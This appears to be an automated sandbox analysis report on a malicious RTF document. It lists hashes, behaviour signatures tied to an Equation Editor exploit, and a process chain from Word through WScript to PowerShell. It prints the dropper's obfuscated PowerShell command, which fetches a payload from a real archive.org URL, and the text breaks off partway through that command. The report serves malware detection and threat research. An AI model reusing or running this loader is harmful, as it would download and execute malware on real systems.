Overview

overview

10

Static

static

1

d5c9ffe037...41.rtf

windows7-x64

10

d5c9ffe037...41.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    100s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 01:41

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41.rtf

  • Size

    83KB

  • MD5

    aebf403b5cddd306587068a601e95d0b

  • SHA1

    371fcd641067189024899d0aabe59b66255915e0

  • SHA256

    d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41

  • SHA512

    ba2d17f1bf011415218359adc63bdf33032faaf175e87f0b5626ab5b5e6287413417a867b3c61eb8af4e7ff65d0265447cc3a4a30ec57588aaeb750e2819840f

  • SSDEEP

    768:b8m17hRO9d/Osx/Fn/j/ULSy8Zmi4Jby8:b8i7MlZ/FTG8oi4r

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2328
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodpicturewithgoodbutterswe.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂VQBy⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂JwBo⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bw⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂Og⥶ ⼻ ㎮ ㋺ ⑂v⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂aQBh⥶ ⼻ ㎮ ㋺ ⑂Dg⥶ ⼻ ㎮ ㋺ ⑂M⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂z⥶ ⼻ ㎮ ㋺ ⑂DE⥶ ⼻ ㎮ ㋺ ⑂M⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂dQBz⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂YQBy⥶ ⼻ ㎮ ㋺ ⑂GM⥶ ⼻ ㎮ ㋺ ⑂a⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂HY⥶ ⼻ ㎮ ㋺ ⑂ZQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂G8⥶ ⼻ ㎮ ㋺ ⑂cgBn⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂Mg⥶ ⼻ ㎮ ㋺ ⑂3⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂aQB0⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQBz⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂dgBi⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂Xw⥶ ⼻ ㎮ ㋺ ⑂y⥶ ⼻ ㎮ ㋺ ⑂D⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂Mg⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂D⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂Nw⥶ ⼻ ㎮ ㋺ ⑂y⥶ ⼻ ㎮ ㋺ ⑂DY⥶ ⼻ ㎮ ㋺ ⑂Xw⥶ ⼻ ㎮ ㋺ ⑂y⥶ ⼻ ㎮ ㋺ ⑂D⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂Mg⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂D⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂Nw⥶ ⼻ ㎮ ㋺ ⑂y⥶ ⼻ ㎮ ㋺ ⑂DY⥶ ⼻ ㎮ ㋺ ⑂LwB2⥶ ⼻ ㎮ ㋺ ⑂GI⥶ ⼻ ㎮ ㋺ ⑂cw⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Go⥶ ⼻ ㎮ ㋺ ⑂c⥶ ⼻ ㎮ ㋺ ⑂Bn⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂Hc⥶ ⼻ ㎮ ㋺ ⑂ZQBi⥶ ⼻ ㎮ ㋺ ⑂EM⥶ ⼻ ㎮ ㋺ ⑂b⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bgB0⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂PQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂E4⥶ ⼻ ㎮ ㋺ ⑂ZQB3⥶ ⼻ ㎮ ㋺ ⑂C0⥶ ⼻ ㎮ ㋺ ⑂TwBi⥶ ⼻ ㎮ ㋺ ⑂Go⥶ ⼻ ㎮ ㋺ ⑂ZQBj⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂BT⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂E4⥶ ⼻ ㎮ ㋺ ⑂ZQB0⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂VwBl⥶ ⼻ ㎮ ㋺ ⑂GI⥶ ⼻ ㎮ ㋺ ⑂QwBs⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂ZQBu⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂ZQBC⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂B3⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂YgBD⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂aQBl⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂EQ⥶ ⼻ ㎮ ㋺ ⑂bwB3⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂b⥶ ⼻ ㎮ ㋺ ⑂Bv⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂BE⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂Cg⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂VQBy⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂KQ⥶ ⼻ ㎮ ㋺ ⑂7⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂aQBt⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂ZwBl⥶ ⼻ ㎮ ㋺ ⑂FQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂WwBT⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂FQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂LgBF⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂YwBv⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂aQBu⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂XQ⥶ ⼻ ㎮ ㋺ ⑂6⥶ ⼻ ㎮ ㋺ ⑂Do⥶ ⼻ ㎮ ㋺ ⑂VQBU⥶ ⼻ ㎮ ㋺ ⑂EY⥶ ⼻ ㎮ ㋺ ⑂O⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Ec⥶ ⼻ ㎮ ㋺ ⑂ZQB0⥶ ⼻ ㎮ ㋺ ⑂FM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂By⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂bgBn⥶ ⼻ ㎮ ㋺ ⑂Cg⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂QgB5⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂ZQBz⥶ ⼻ ㎮ ㋺ ⑂Ck⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BG⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂PQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂P⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂8⥶ ⼻ ㎮ ㋺ ⑂EI⥶ ⼻ ㎮ ㋺ ⑂QQBT⥶ ⼻ ㎮ ㋺ ⑂EU⥶ ⼻ ㎮ ㋺ ⑂Ng⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂F8⥶ ⼻ ㎮ ㋺ ⑂UwBU⥶ ⼻ ㎮ ㋺ ⑂EE⥶ ⼻ ㎮ ㋺ ⑂UgBU⥶ ⼻ ㎮ ㋺ ⑂D4⥶ ⼻ ㎮ ㋺ ⑂Pg⥶ ⼻ ㎮ ㋺ ⑂n⥶ ⼻ ㎮ ㋺ ⑂Ds⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂BG⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂PQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂P⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂8⥶ ⼻ ㎮ ㋺ ⑂EI⥶ ⼻ ㎮ ㋺ ⑂QQBT⥶ ⼻ ㎮ ㋺ ⑂EU⥶ ⼻ ㎮ ㋺ ⑂Ng⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂F8⥶ ⼻ ㎮ ㋺ ⑂RQBO⥶ ⼻ ㎮ ㋺ ⑂EQ⥶ ⼻ ㎮ ㋺ ⑂Pg⥶ ⼻ ㎮ ㋺ ⑂+⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BJ⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂Hg⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bp⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂V⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂Hg⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Ek⥶ ⼻ ㎮ ㋺ ⑂bgBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂e⥶ ⼻ ㎮ ㋺ ⑂BP⥶ ⼻ ㎮ ㋺ ⑂GY⥶ ⼻ ㎮ ㋺ ⑂K⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BG⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂Ck⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bgBk⥶ ⼻ ㎮ ㋺ ⑂Ek⥶ ⼻ ㎮ ㋺ ⑂bgBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂e⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂D0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂ZQBU⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂e⥶ ⼻ ㎮ ㋺ ⑂B0⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂SQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂E8⥶ ⼻ ㎮ ㋺ ⑂Zg⥶ ⼻ ㎮ ㋺ ⑂o⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂ZQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂RgBs⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Zw⥶ ⼻ ㎮ ㋺ ⑂p⥶ ⼻ ㎮ ㋺ ⑂Ds⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bz⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂YQBy⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂SQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂LQBn⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂w⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂LQBh⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂ZQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂SQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂LQBn⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BJ⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂Hg⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BJ⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂Hg⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂r⥶ ⼻ ㎮ ㋺ ⑂D0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BG⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂YQBn⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂T⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂ZwB0⥶ ⼻ ㎮ ㋺ ⑂Gg⥶ ⼻ ㎮ ㋺ ⑂Ow⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂GI⥶ ⼻ ㎮ ㋺ ⑂YQBz⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂Ng⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂Ew⥶ ⼻ ㎮ ㋺ ⑂ZQBu⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bo⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂PQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂ZQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂SQBu⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂ZQB4⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂LQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂cgB0⥶ ⼻ ㎮ ㋺ ⑂Ek⥶ ⼻ ㎮ ㋺ ⑂bgBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂e⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂7⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂YgBh⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂ZQ⥶ ⼻ ㎮ ㋺ ⑂2⥶ ⼻ ㎮ ㋺ ⑂DQ⥶ ⼻ ㎮ ㋺ ⑂QwBv⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂D0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂ZQBU⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂e⥶ ⼻ ㎮ ㋺ ⑂B0⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂UwB1⥶ ⼻ ㎮ ㋺ ⑂GI⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂aQBu⥶ ⼻ ㎮ ㋺ ⑂Gc⥶ ⼻ ㎮ ㋺ ⑂K⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bh⥶ ⼻ ㎮ ㋺ ⑂HI⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BJ⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂Hg⥶ ⼻ ㎮ ㋺ ⑂L⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂YgBh⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂ZQ⥶ ⼻ ㎮ ㋺ ⑂2⥶ ⼻ ㎮ ㋺ ⑂DQ⥶ ⼻ ㎮ ㋺ ⑂T⥶ ⼻ ㎮ 